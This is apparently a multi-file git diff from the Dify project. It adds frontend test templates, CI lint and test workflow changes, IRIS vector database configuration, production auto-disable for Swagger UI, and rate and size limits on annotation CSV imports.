// Test Helpers
// ============================================================================
// const renderComponent = (props = {}) => {
// return render(<ComponentName {...createMockProps(props)} />)
// }
// ============================================================================
// Tests
// ============================================================================
describe('ComponentName', () => {
// WHY beforeEach with clearAllMocks?
// - Ensures each test starts with clean slate
// - Prevents mock call history from leaking between tests
// - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes
beforeEach(() => {
jest.clearAllMocks()
// Reset shared mock state if used (CRITICAL for portal/dropdown tests)
// mockOpenState = false
})
// --------------------------------------------------------------------------
// Rendering Tests (REQUIRED - Every component MUST have these)
// --------------------------------------------------------------------------
// WHY: Catches import errors, missing providers, and basic render issues
describe('Rendering', () => {
it('should render without crashing', () => {
// Arrange - Setup data and mocks
// const props = createMockProps()
// Act - Render the component
// render(<ComponentName {...props} />)
// Assert - Verify expected output
// Prefer getByRole for accessibility; it's what users "see"
// expect(screen.getByRole('...')).toBeInTheDocument()
})
it('should render with default props', () => {
// WHY: Verifies component works without optional props
// render(<ComponentName />)
// expect(screen.getByText('...')).toBeInTheDocument()
})
})
// --------------------------------------------------------------------------
// Props Tests (REQUIRED - Every component MUST test prop behavior)
// --------------------------------------------------------------------------
// WHY: Props are the component's API contract. Test them thoroughly.
describe('Props', () => {
it('should apply custom className', () => {
// WHY: Common pattern in Dify - components should merge custom classes
// render(<ComponentName className="custom-class" />)
// expect(screen.getByTestId('component')).toHaveClass('custom-class')
})
it('should use default values for optional props', () => {
// WHY: Verifies TypeScript defaults work at runtime
// render(<ComponentName />)
// expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value')
})
})
// --------------------------------------------------------------------------
// User Interactions (if component has event handlers - on*, handle*)
// --------------------------------------------------------------------------
// WHY: Event handlers are core functionality. Test from user's perspective.
describe('User Interactions', () => {
it('should call onClick when clicked', async () => {
// WHY userEvent over fireEvent?
// - userEvent simulates real user behavior (focus, hover, then click)
// - fireEvent is lower-level, doesn't trigger all browser events
// const user = userEvent.setup()
// const handleClick = jest.fn()
// render(<ComponentName onClick={handleClick} />)
//
// await user.click(screen.getByRole('button'))
//
// expect(handleClick).toHaveBeenCalledTimes(1)
})
it('should call onChange when value changes', async () => {
// const user = userEvent.setup()
// const handleChange = jest.fn()
// render(<ComponentName onChange={handleChange} />)
//
// await user.type(screen.getByRole('textbox'), 'new value')
//
// expect(handleChange).toHaveBeenCalled()
})
})
// --------------------------------------------------------------------------
// State Management (if component uses useState/useReducer)
// --------------------------------------------------------------------------
// WHY: Test state through observable UI changes, not internal state values
describe('State Management', () => {
it('should update state on interaction', async () => {
// WHY test via UI, not state?
// - State is implementation detail; UI is what users see
// - If UI works correctly, state must be correct
// const user = userEvent.setup()
// render(<ComponentName />)
//
// // Initial state - verify what user sees
// expect(screen.getByText('Initial')).toBeInTheDocument()
//
// // Trigger state change via user action
// await user.click(screen.getByRole('button'))
//
// // New state - verify UI updated
// expect(screen.getByText('Updated')).toBeInTheDocument()
})
})
// --------------------------------------------------------------------------
// Async Operations (if component fetches data - useSWR, useQuery, fetch)
// --------------------------------------------------------------------------
// WHY: Async operations have 3 states users experience: loading, success, error
describe('Async Operations', () => {
it('should show loading state', () => {
// WHY never-resolving promise?
// - Keeps component in loading state for assertion
// - Alternative: use fake timers
// mockedApi.fetchData.mockImplementation(() => new Promise(() => {}))
// render(<ComponentName />)
//
// expect(screen.getByText(/loading/i)).toBeInTheDocument()
})
it('should show data on success', async () => {
// WHY waitFor?
// - Component updates asynchronously after fetch resolves
// - waitFor retries assertion until it passes or times out
// mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] })
// render(<ComponentName />)
//
// await waitFor(() => {
// expect(screen.getByText('Item 1')).toBeInTheDocument()
// })
})
it('should show error on failure', async () => {
// mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
// render(<ComponentName />)
//
// await waitFor(() => {
// expect(screen.getByText(/error/i)).toBeInTheDocument()
// })
})
})
// --------------------------------------------------------------------------
// Edge Cases (REQUIRED - Every component MUST handle edge cases)
// --------------------------------------------------------------------------
// WHY: Real-world data is messy. Components must handle:
// - Null/undefined from API failures or optional fields
// - Empty arrays/strings from user clearing data
// - Boundary values (0, MAX_INT, special characters)
describe('Edge Cases', () => {
it('should handle null value', () => {
// WHY test null specifically?
// - API might return null for missing data
// - Prevents "Cannot read property of null" in production
// render(<ComponentName value={null} />)
// expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
it('should handle undefined value', () => {
// WHY test undefined separately from null?
// - TypeScript treats them differently
// - Optional props are undefined, not null
// render(<ComponentName value={undefined} />)
// expect(screen.getByText(/no data/i)).toBeInTheDocument()
})
it('should handle empty array', () => {
// WHY: Empty state often needs special UI (e.g., "No items yet")
// render(<ComponentName items={[]} />)
// expect(screen.getByText(/empty/i)).toBeInTheDocument()
})
it('should handle empty string', () => {
// WHY: Empty strings are truthy in JS but visually empty
// render(<ComponentName text="" />)
// expect(screen.getByText(/placeholder/i)).toBeInTheDocument()
})
})
// --------------------------------------------------------------------------
// Accessibility (optional but recommended for Dify's enterprise users)
// --------------------------------------------------------------------------
// WHY: Dify has enterprise customers who may require accessibility compliance
describe('Accessibility', () => {
it('should have accessible name', () => {
// WHY getByRole with name?
// - Tests that screen readers can identify the element
// - Enforces proper labeling practices
// render(<ComponentName label="Test Label" />)
// expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument()
})
it('should support keyboard navigation', async () => {
// WHY: Some users can't use a mouse
// const user = userEvent.setup()
// render(<ComponentName />)
//
// await user.tab()
// expect(screen.getByRole('button')).toHaveFocus()
})
})
})

View File

@ -0,0 +1,207 @@
/**
* Test Template for Custom Hooks
*
* Instructions:
* 1. Replace `useHookName` with your hook name
* 2. Update import path
* 3. Add/remove test sections based on hook features
*/
import { renderHook, act, waitFor } from '@testing-library/react'
// import { useHookName } from './use-hook-name'
// ============================================================================
// Mocks
// ============================================================================
// API services (if hook fetches data)
// jest.mock('@/service/api')
// import * as api from '@/service/api'
// const mockedApi = api as jest.Mocked<typeof api>
// ============================================================================
// Test Helpers
// ============================================================================
// Wrapper for hooks that need context
// const createWrapper = (contextValue = {}) => {
// return ({ children }: { children: React.ReactNode }) => (
// <SomeContext.Provider value={contextValue}>
// {children}
// </SomeContext.Provider>
// )
// }
// ============================================================================
// Tests
// ============================================================================
describe('useHookName', () => {
beforeEach(() => {
jest.clearAllMocks()
})
// --------------------------------------------------------------------------
// Initial State
// --------------------------------------------------------------------------
describe('Initial State', () => {
it('should return initial state', () => {
// const { result } = renderHook(() => useHookName())
//
// expect(result.current.value).toBe(initialValue)
// expect(result.current.isLoading).toBe(false)
})
it('should accept initial value from props', () => {
// const { result } = renderHook(() => useHookName({ initialValue: 'custom' }))
//
// expect(result.current.value).toBe('custom')
})
})
// --------------------------------------------------------------------------
// State Updates
// --------------------------------------------------------------------------
describe('State Updates', () => {
it('should update value when setValue is called', () => {
// const { result } = renderHook(() => useHookName())
//
// act(() => {
// result.current.setValue('new value')
// })
//
// expect(result.current.value).toBe('new value')
})
it('should reset to initial value', () => {
// const { result } = renderHook(() => useHookName({ initialValue: 'initial' }))
//
// act(() => {
// result.current.setValue('changed')
// })
// expect(result.current.value).toBe('changed')
//
// act(() => {
// result.current.reset()
// })
// expect(result.current.value).toBe('initial')
})
})
// --------------------------------------------------------------------------
// Async Operations
// --------------------------------------------------------------------------
describe('Async Operations', () => {
it('should fetch data on mount', async () => {
// mockedApi.fetchData.mockResolvedValue({ data: 'test' })
//
// const { result } = renderHook(() => useHookName())
//
// // Initially loading
// expect(result.current.isLoading).toBe(true)
//
// // Wait for data
// await waitFor(() => {
// expect(result.current.isLoading).toBe(false)
// })
//
// expect(result.current.data).toEqual({ data: 'test' })
})
it('should handle fetch error', async () => {
// mockedApi.fetchData.mockRejectedValue(new Error('Network error'))
//
// const { result } = renderHook(() => useHookName())
//
// await waitFor(() => {
// expect(result.current.error).toBeTruthy()
// })
//
// expect(result.current.error?.message).toBe('Network error')
})
it('should refetch when dependency changes', async () => {
// mockedApi.fetchData.mockResolvedValue({ data: 'test' })
//
// const { result, rerender } = renderHook(
// ({ id }) => useHookName(id),
// { initialProps: { id: '1' } }
// )
//
// await waitFor(() => {
// expect(mockedApi.fetchData).toHaveBeenCalledWith('1')
// })
//
// rerender({ id: '2' })
//
// await waitFor(() => {
// expect(mockedApi.fetchData).toHaveBeenCalledWith('2')
// })
})
})
// --------------------------------------------------------------------------
// Side Effects
// --------------------------------------------------------------------------
describe('Side Effects', () => {
it('should call callback when value changes', () => {
// const callback = jest.fn()
// const { result } = renderHook(() => useHookName({ onChange: callback }))
//
// act(() => {
// result.current.setValue('new value')
// })
//
// expect(callback).toHaveBeenCalledWith('new value')
})
it('should cleanup on unmount', () => {
// const cleanup = jest.fn()
// jest.spyOn(window, 'addEventListener')
// jest.spyOn(window, 'removeEventListener')
//
// const { unmount } = renderHook(() => useHookName())
//
// expect(window.addEventListener).toHaveBeenCalled()
//
// unmount()
//
// expect(window.removeEventListener).toHaveBeenCalled()
})
})
// --------------------------------------------------------------------------
// Edge Cases
// --------------------------------------------------------------------------
describe('Edge Cases', () => {
it('should handle null input', () => {
// const { result } = renderHook(() => useHookName(null))
//
// expect(result.current.value).toBeNull()
})
it('should handle rapid updates', () => {
// const { result } = renderHook(() => useHookName())
//
// act(() => {
// result.current.setValue('1')
// result.current.setValue('2')
// result.current.setValue('3')
// })
//
// expect(result.current.value).toBe('3')
})
})
// --------------------------------------------------------------------------
// With Context (if hook uses context)
// --------------------------------------------------------------------------
describe('With Context', () => {
it('should use context value', () => {
// const wrapper = createWrapper({ someValue: 'context-value' })
// const { result } = renderHook(() => useHookName(), { wrapper })
//
// expect(result.current.contextValue).toBe('context-value')
})
})
})

View File

@ -0,0 +1,154 @@
/**
* Test Template for Utility Functions
*
* Instructions:
* 1. Replace `utilityFunction` with your function name
* 2. Update import path
* 3. Use test.each for data-driven tests
*/
// import { utilityFunction } from './utility'
// ============================================================================
// Tests
// ============================================================================
describe('utilityFunction', () => {
// --------------------------------------------------------------------------
// Basic Functionality
// --------------------------------------------------------------------------
describe('Basic Functionality', () => {
it('should return expected result for valid input', () => {
// expect(utilityFunction('input')).toBe('expected-output')
})
it('should handle multiple arguments', () => {
// expect(utilityFunction('a', 'b', 'c')).toBe('abc')
})
})
// --------------------------------------------------------------------------
// Data-Driven Tests
// --------------------------------------------------------------------------
describe('Input/Output Mapping', () => {
test.each([
// [input, expected]
['input1', 'output1'],
['input2', 'output2'],
['input3', 'output3'],
])('should map input %s to %s', (input, expected) => {
// expect(utilityFunction(input)).toBe(expected)
})
})
// --------------------------------------------------------------------------
// Edge Cases
// --------------------------------------------------------------------------
describe('Edge Cases', () => {
it('should handle empty string', () => {
// expect(utilityFunction('')).toBe('')
})
it('should handle null', () => {
// expect(utilityFunction(null)).toBe(null)
// or
// expect(() => utilityFunction(null)).toThrow()
})
it('should handle undefined', () => {
// expect(utilityFunction(undefined)).toBe(undefined)
// or
// expect(() => utilityFunction(undefined)).toThrow()
})
it('should handle empty array', () => {
// expect(utilityFunction([])).toEqual([])
})
it('should handle empty object', () => {
// expect(utilityFunction({})).toEqual({})
})
})
// --------------------------------------------------------------------------
// Boundary Conditions
// --------------------------------------------------------------------------
describe('Boundary Conditions', () => {
it('should handle minimum value', () => {
// expect(utilityFunction(0)).toBe(0)
})
it('should handle maximum value', () => {
// expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...)
})
it('should handle negative numbers', () => {
// expect(utilityFunction(-1)).toBe(...)
})
})
// --------------------------------------------------------------------------
// Type Coercion (if applicable)
// --------------------------------------------------------------------------
describe('Type Handling', () => {
it('should handle numeric string', () => {
// expect(utilityFunction('123')).toBe(123)
})
it('should handle boolean', () => {
// expect(utilityFunction(true)).toBe(...)
})
})
// --------------------------------------------------------------------------
// Error Cases
// --------------------------------------------------------------------------
describe('Error Handling', () => {
it('should throw for invalid input', () => {
// expect(() => utilityFunction('invalid')).toThrow('Error message')
})
it('should throw with specific error type', () => {
// expect(() => utilityFunction('invalid')).toThrow(ValidationError)
})
})
// --------------------------------------------------------------------------
// Complex Objects (if applicable)
// --------------------------------------------------------------------------
describe('Object Handling', () => {
it('should preserve object structure', () => {
// const input = { a: 1, b: 2 }
// expect(utilityFunction(input)).toEqual({ a: 1, b: 2 })
})
it('should handle nested objects', () => {
// const input = { nested: { deep: 'value' } }
// expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } })
})
it('should not mutate input', () => {
// const input = { a: 1 }
// const inputCopy = { ...input }
// utilityFunction(input)
// expect(input).toEqual(inputCopy)
})
})
// --------------------------------------------------------------------------
// Array Handling (if applicable)
// --------------------------------------------------------------------------
describe('Array Handling', () => {
it('should process all elements', () => {
// expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6])
})
it('should handle single element array', () => {
// expect(utilityFunction([1])).toEqual([2])
})
it('should preserve order', () => {
// expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b'])
})
})
})

5
.coveragerc Normal file
View File

@ -0,0 +1,5 @@
[run]
omit =
api/tests/*
api/migrations/*
api/core/rag/datasource/vdb/*

View File

@ -1,12 +0,0 @@
# Copilot Instructions
GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`.
Key reminders:
- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks).
- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable.
- Target >95% line and branch coverage and 100% function/statement coverage.
- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities.
Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance.

View File

@ -71,18 +71,18 @@ jobs:
run: |
cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env
- name: Run Workflow
run: uv run --project api bash dev/pytest/pytest_workflow.sh
- name: Run Tool
run: uv run --project api bash dev/pytest/pytest_tools.sh
- name: Run TestContainers
run: uv run --project api bash dev/pytest/pytest_testcontainers.sh
- name: Run Unit tests
- name: Run API Tests
env:
STORAGE_TYPE: opendal
OPENDAL_SCHEME: fs
OPENDAL_FS_ROOT: /tmp/dify-storage
run: |
uv run --project api bash dev/pytest/pytest_unit_tests.sh
uv run --project api pytest \
--timeout "${PYTEST_TIMEOUT:-180}" \
api/tests/integration_tests/workflow \
api/tests/integration_tests/tools \
api/tests/test_containers_integration_tests \
api/tests/unit_tests
- name: Coverage Summary
run: |
@ -94,4 +94,3 @@ jobs:
echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY
echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY
uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY

View File

@ -13,11 +13,12 @@ jobs:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v4
# Use uv to ensure we have the same ruff version in CI and locally.
- uses: astral-sh/setup-uv@v6
- uses: actions/setup-python@v5
with:
python-version: "3.11"
- uses: astral-sh/setup-uv@v6
- run: |
cd api
uv sync --dev
@ -35,10 +36,11 @@ jobs:
- name: ast-grep
run: |
uvx --from ast-grep-cli sg --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all
uvx --from ast-grep-cli sg --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all
uvx --from ast-grep-cli sg -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all
uvx --from ast-grep-cli sg -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all
# ast-grep exits 1 if no matches are found; allow idempotent runs.
uvx --from ast-grep-cli ast-grep --pattern 'db.session.query($WHATEVER).filter($HERE)' --rewrite 'db.session.query($WHATEVER).where($HERE)' -l py --update-all || true
uvx --from ast-grep-cli ast-grep --pattern 'session.query($WHATEVER).filter($HERE)' --rewrite 'session.query($WHATEVER).where($HERE)' -l py --update-all || true
uvx --from ast-grep-cli ast-grep -p '$A = db.Column($$$B)' -r '$A = mapped_column($$$B)' -l py --update-all || true
uvx --from ast-grep-cli ast-grep -p '$A : $T = db.Column($$$B)' -r '$A : $T = mapped_column($$$B)' -l py --update-all || true
# Convert Optional[T] to T | None (ignoring quoted types)
cat > /tmp/optional-rule.yml << 'EOF'
id: convert-optional-to-union
@ -56,14 +58,15 @@ jobs:
pattern: $T
fix: $T | None
EOF
uvx --from ast-grep-cli sg scan --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all
uvx --from ast-grep-cli ast-grep scan . --inline-rules "$(cat /tmp/optional-rule.yml)" --update-all
# Fix forward references that were incorrectly converted (Python doesn't support "Type" | None syntax)
find . -name "*.py" -type f -exec sed -i.bak -E 's/"([^"]+)" \| None/Optional["\1"]/g; s/'"'"'([^'"'"']+)'"'"' \| None/Optional['"'"'\1'"'"']/g' {} \;
find . -name "*.py.bak" -type f -delete
# mdformat breaks YAML front matter in markdown files. Add --exclude for directories containing YAML front matter.
- name: mdformat
run: |
uvx mdformat .
uvx --python 3.13 mdformat . --exclude ".claude/skills/**"
- name: Install pnpm
uses: pnpm/action-setup@v4
@ -84,7 +87,6 @@ jobs:
- name: oxlint
working-directory: ./web
run: |
pnpx oxlint --fix
run: pnpm exec oxlint --config .oxlintrc.json --fix .
- uses: autofix-ci/action@635ffb0c9798bd160680f18fd73371e355b85f27

1
.gitignore vendored
View File

@ -189,6 +189,7 @@ docker/volumes/matrixone/*
docker/volumes/mysql/*
docker/volumes/seekdb/*
!docker/volumes/oceanbase/init.d
docker/volumes/iris/*
docker/nginx/conf.d/default.conf
docker/nginx/ssl/*

1
.nvmrc Normal file
View File

@ -0,0 +1 @@
22.11.0

View File

@ -1,5 +0,0 @@
# Windsurf Testing Rules
- Use `web/testing/testing.md` as the single source of truth for frontend automated testing.
- Honor every requirement in that document when generating or accepting tests.
- When proposing or saving tests, re-read that document and follow every requirement.

View File

@ -626,7 +626,17 @@ QUEUE_MONITOR_ALERT_EMAILS=
QUEUE_MONITOR_INTERVAL=30
# Swagger UI configuration
SWAGGER_UI_ENABLED=true
# SECURITY: Swagger UI is automatically disabled in PRODUCTION environment (DEPLOY_ENV=PRODUCTION)
# to prevent API information disclosure.
#
# Behavior:
# - DEPLOY_ENV=PRODUCTION + SWAGGER_UI_ENABLED not set -> Swagger DISABLED (secure default)
# - DEPLOY_ENV=DEVELOPMENT/TESTING + SWAGGER_UI_ENABLED not set -> Swagger ENABLED
# - SWAGGER_UI_ENABLED=true -> Swagger ENABLED (overrides environment check)
# - SWAGGER_UI_ENABLED=false -> Swagger DISABLED (explicit disable)
#
# For development, you can uncomment below or set DEPLOY_ENV=DEVELOPMENT
# SWAGGER_UI_ENABLED=false
SWAGGER_UI_PATH=/swagger-ui.html
# Whether to encrypt dataset IDs when exporting DSL files (default: true)
@ -660,3 +670,14 @@ SINGLE_CHUNK_ATTACHMENT_LIMIT=10
ATTACHMENT_IMAGE_FILE_SIZE_LIMIT=2
ATTACHMENT_IMAGE_DOWNLOAD_TIMEOUT=60
IMAGE_FILE_BATCH_LIMIT=10
# Maximum allowed CSV file size for annotation import in megabytes
ANNOTATION_IMPORT_FILE_SIZE_LIMIT=2
# Maximum number of annotation records allowed in a single import
ANNOTATION_IMPORT_MAX_RECORDS=10000
# Minimum number of annotation records required in a single import
ANNOTATION_IMPORT_MIN_RECORDS=1
ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE=5
ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR=20
# Maximum number of concurrent annotation import tasks per tenant
ANNOTATION_IMPORT_MAX_CONCURRENT=5

View File

@ -83,6 +83,7 @@ def initialize_extensions(app: DifyApp):
ext_redis,
ext_request_logging,
ext_sentry,
ext_session_factory,
ext_set_secretkey,
ext_storage,
ext_timezone,
@ -114,6 +115,7 @@ def initialize_extensions(app: DifyApp):
ext_commands,
ext_otel,
ext_request_logging,
ext_session_factory,
]
for ext in extensions:
short_name = ext.__name__.split(".")[-1]

View File

@ -380,6 +380,37 @@ class FileUploadConfig(BaseSettings):
default=60,
)
# Annotation Import Security Configurations
ANNOTATION_IMPORT_FILE_SIZE_LIMIT: NonNegativeInt = Field(
description="Maximum allowed CSV file size for annotation import in megabytes",
default=2,
)
ANNOTATION_IMPORT_MAX_RECORDS: PositiveInt = Field(
description="Maximum number of annotation records allowed in a single import",
default=10000,
)
ANNOTATION_IMPORT_MIN_RECORDS: PositiveInt = Field(
description="Minimum number of annotation records required in a single import",
default=1,
)
ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE: PositiveInt = Field(
description="Maximum number of annotation import requests per minute per tenant",
default=5,
)
ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR: PositiveInt = Field(
description="Maximum number of annotation import requests per hour per tenant",
default=20,
)
ANNOTATION_IMPORT_MAX_CONCURRENT: PositiveInt = Field(
description="Maximum number of concurrent annotation import tasks per tenant",
default=2,
)
inner_UPLOAD_FILE_EXTENSION_BLACKLIST: str = Field(
description=(
"Comma-separated list of file extensions that are blocked from upload. "
@ -1221,9 +1252,19 @@ class WorkflowLogConfig(BaseSettings):
class SwaggerUIConfig(BaseSettings):
SWAGGER_UI_ENABLED: bool = Field(
description="Whether to enable Swagger UI in api module",
default=True,
"""
Configuration for Swagger UI documentation.
Security Note: Swagger UI is automatically disabled in PRODUCTION environment
to prevent API information disclosure. Set SWAGGER_UI_ENABLED=true explicitly
to enable in production if needed.
"""
SWAGGER_UI_ENABLED: bool | None = Field(
description="Whether to enable Swagger UI in api module. "
"Automatically disabled in PRODUCTION environment for security. "
"Set to true explicitly to enable in production.",
default=None,
)
SWAGGER_UI_PATH: str = Field(
@ -1231,6 +1272,23 @@ class SwaggerUIConfig(BaseSettings):
default="/swagger-ui.html",
)
@property
def swagger_ui_enabled(self) -> bool:
"""
Compute whether Swagger UI should be enabled.
If SWAGGER_UI_ENABLED is explicitly set, use that value.
Otherwise, disable in PRODUCTION environment for security.
"""
if self.SWAGGER_UI_ENABLED is not None:
return self.SWAGGER_UI_ENABLED
# Auto-disable in production environment
import os
deploy_env = os.environ.get("DEPLOY_ENV", "PRODUCTION")
return deploy_env.upper() != "PRODUCTION"
class TenantIsolatedTaskQueueConfig(BaseSettings):
TENANT_ISOLATED_TASK_CONCURRENCY: int = Field(

View File

@ -26,6 +26,7 @@ from .vdb.clickzetta_config import ClickzettaConfig
from .vdb.couchbase_config import CouchbaseConfig
from .vdb.elasticsearch_config import ElasticsearchConfig
from .vdb.huawei_cloud_config import HuaweiCloudConfig
from .vdb.iris_config import IrisVectorConfig
from .vdb.lindorm_config import LindormConfig
from .vdb.matrixone_config import MatrixoneConfig
from .vdb.milvus_config import MilvusConfig
@ -336,6 +337,7 @@ class MiddlewareConfig(
ChromaConfig,
ClickzettaConfig,
HuaweiCloudConfig,
IrisVectorConfig,
MilvusConfig,
AlibabaCloudMySQLConfig,
MyScaleConfig,

View File

@ -0,0 +1,91 @@
"""Configuration for InterSystems IRIS vector database."""
from pydantic import Field, PositiveInt, model_validator
from pydantic_settings import BaseSettings
class IrisVectorConfig(BaseSettings):
"""Configuration settings for IRIS vector database connection and pooling."""
IRIS_HOST: str | None = Field(
description="Hostname or IP address of the IRIS server.",
default="localhost",
)
IRIS_SUPER_SERVER_PORT: PositiveInt | None = Field(
description="Port number for IRIS connection.",
default=1972,
)
IRIS_USER: str | None = Field(
description="Username for IRIS authentication.",
default="_SYSTEM",
)
IRIS_PASSWORD: str | None = Field(
description="Password for IRIS authentication.",
default="Dify@1234",
)
IRIS_SCHEMA: str | None = Field(
description="Schema name for IRIS tables.",
default="dify",
)
IRIS_DATABASE: str | None = Field(
description="Database namespace for IRIS connection.",
default="USER",
)
IRIS_CONNECTION_URL: str | None = Field(
description="Full connection URL for IRIS (overrides individual fields if provided).",
default=None,
)
IRIS_MIN_CONNECTION: PositiveInt = Field(
description="Minimum number of connections in the pool.",
default=1,
)
IRIS_MAX_CONNECTION: PositiveInt = Field(
description="Maximum number of connections in the pool.",
default=3,
)
IRIS_TEXT_INDEX: bool = Field(
description="Enable full-text search index using %iFind.Index.Basic.",
default=True,
)
IRIS_TEXT_INDEX_LANGUAGE: str = Field(
description="Language for full-text search index (e.g., 'en', 'ja', 'zh', 'de').",
default="en",
)
@model_validator(mode="before")
@classmethod
def validate_config(cls, values: dict) -> dict:
"""Validate IRIS configuration values.
Args:
values: Configuration dictionary
Returns:
Validated configuration dictionary
Raises:
ValueError: If required fields are missing or pool settings are invalid
"""
# Only validate required fields if IRIS is being used as the vector store
# This allows the config to be loaded even when IRIS is not in use
# vector_store = os.environ.get("VECTOR_STORE", "")
# We rely on Pydantic defaults for required fields if they are missing from env.
# Strict existence check is removed to allow defaults to work.
min_conn = values.get("IRIS_MIN_CONNECTION", 1)
max_conn = values.get("IRIS_MAX_CONNECTION", 3)
if min_conn > max_conn:
raise ValueError("IRIS_MIN_CONNECTION must be less than or equal to IRIS_MAX_CONNECTION")
return values

View File

@ -20,6 +20,7 @@ language_timezone_mapping = {
"sl-SI": "Europe/Ljubljana",
"th-TH": "Asia/Bangkok",
"id-ID": "Asia/Jakarta",
"ar-TN": "Africa/Tunis",
}
languages = list(language_timezone_mapping.keys())

View File

@ -6,19 +6,20 @@ from flask import request
from flask_restx import Resource
from pydantic import BaseModel, Field, field_validator
from sqlalchemy import select
from sqlalchemy.orm import Session
from werkzeug.exceptions import NotFound, Unauthorized
P = ParamSpec("P")
R = TypeVar("R")
from configs import dify_config
from constants.languages import supported_language
from controllers.console import console_ns
from controllers.console.wraps import only_edition_cloud
from core.db.session_factory import session_factory
from extensions.ext_database import db
from libs.token import extract_access_token
from models.model import App, InstalledApp, RecommendedApp
P = ParamSpec("P")
R = TypeVar("R")
DEFAULT_REF_TEMPLATE_SWAGGER_2_0 = "#/definitions/{model}"
@ -90,7 +91,7 @@ class InsertExploreAppListApi(Resource):
privacy_policy = site.privacy_policy or payload.privacy_policy or ""
custom_disclaimer = site.custom_disclaimer or payload.custom_disclaimer or ""
with Session(db.engine) as session:
with session_factory.create_session() as session:
recommended_app = session.execute(
select(RecommendedApp).where(RecommendedApp.app_id == payload.app_id)
).scalar_one_or_none()
@ -138,7 +139,7 @@ class InsertExploreAppApi(Resource):
@only_edition_cloud
@admin_required
def delete(self, app_id):
with Session(db.engine) as session:
with session_factory.create_session() as session:
recommended_app = session.execute(
select(RecommendedApp).where(RecommendedApp.app_id == str(app_id))
).scalar_one_or_none()
@ -146,13 +147,13 @@ class InsertExploreAppApi(Resource):
if not recommended_app:
return {"result": "success"}, 204
with Session(db.engine) as session:
with session_factory.create_session() as session:
app = session.execute(select(App).where(App.id == recommended_app.app_id)).scalar_one_or_none()
if app:
app.is_public = False
with Session(db.engine) as session:
with session_factory.create_session() as session:
installed_apps = (
session.execute(
select(InstalledApp).where(

View File

@ -1,6 +1,6 @@
from typing import Any, Literal
from flask import request
from flask import abort, make_response, request
from flask_restx import Resource, fields, marshal, marshal_with
from pydantic import BaseModel, Field, field_validator
@ -8,6 +8,8 @@ from controllers.common.errors import NoFileUploadedError, TooManyFilesError
from controllers.console import console_ns
from controllers.console.wraps import (
account_initialization_required,
annotation_import_concurrency_limit,
annotation_import_rate_limit,
cloud_edition_billing_resource_check,
edit_permission_required,
setup_required,
@ -257,7 +259,7 @@ class AnnotationApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/annotations/export")
class AnnotationExportApi(Resource):
@console_ns.doc("export_annotations")
@console_ns.doc(description="Export all annotations for an app")
@console_ns.doc(description="Export all annotations for an app with CSV injection protection")
@console_ns.doc(params={"app_id": "Application ID"})
@console_ns.response(
200,
@ -272,8 +274,14 @@ class AnnotationExportApi(Resource):
def get(self, app_id):
app_id = str(app_id)
annotation_list = AppAnnotationService.export_annotation_list_by_app_id(app_id)
response = {"data": marshal(annotation_list, annotation_fields)}
return response, 200
response_data = {"data": marshal(annotation_list, annotation_fields)}
# Create response with secure headers for CSV export
response = make_response(response_data, 200)
response.headers["Content-Type"] = "application/json; charset=utf-8"
response.headers["X-Content-Type-Options"] = "nosniff"
return response
@console_ns.route("/apps/<uuid:app_id>/annotations/<uuid:annotation_id>")
@ -314,18 +322,25 @@ class AnnotationUpdateDeleteApi(Resource):
@console_ns.route("/apps/<uuid:app_id>/annotations/batch-import")
class AnnotationBatchImportApi(Resource):
@console_ns.doc("batch_import_annotations")
@console_ns.doc(description="Batch import annotations from CSV file")
@console_ns.doc(description="Batch import annotations from CSV file with rate limiting and security checks")
@console_ns.doc(params={"app_id": "Application ID"})
@console_ns.response(200, "Batch import started successfully")
@console_ns.response(403, "Insufficient permissions")
@console_ns.response(400, "No file uploaded or too many files")
@console_ns.response(413, "File too large")
@console_ns.response(429, "Too many requests or concurrent imports")
@setup_required
@login_required
@account_initialization_required
@cloud_edition_billing_resource_check("annotation")
@annotation_import_rate_limit
@annotation_import_concurrency_limit
@edit_permission_required
def post(self, app_id):
from configs import dify_config
app_id = str(app_id)
# check file
if "file" not in request.files:
raise NoFileUploadedError()
@ -335,9 +350,27 @@ class AnnotationBatchImportApi(Resource):
# get file from request
file = request.files["file"]
# check file type
if not file.filename or not file.filename.lower().endswith(".csv"):
raise ValueError("Invalid file type. Only CSV files are allowed")
# Check file size before processing
file.seek(0, 2) # Seek to end of file
file_size = file.tell()
file.seek(0) # Reset to beginning
max_size_bytes = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024
if file_size > max_size_bytes:
abort(
413,
f"File size exceeds maximum limit of {dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT}MB. "
f"Please reduce the file size and try again.",
)
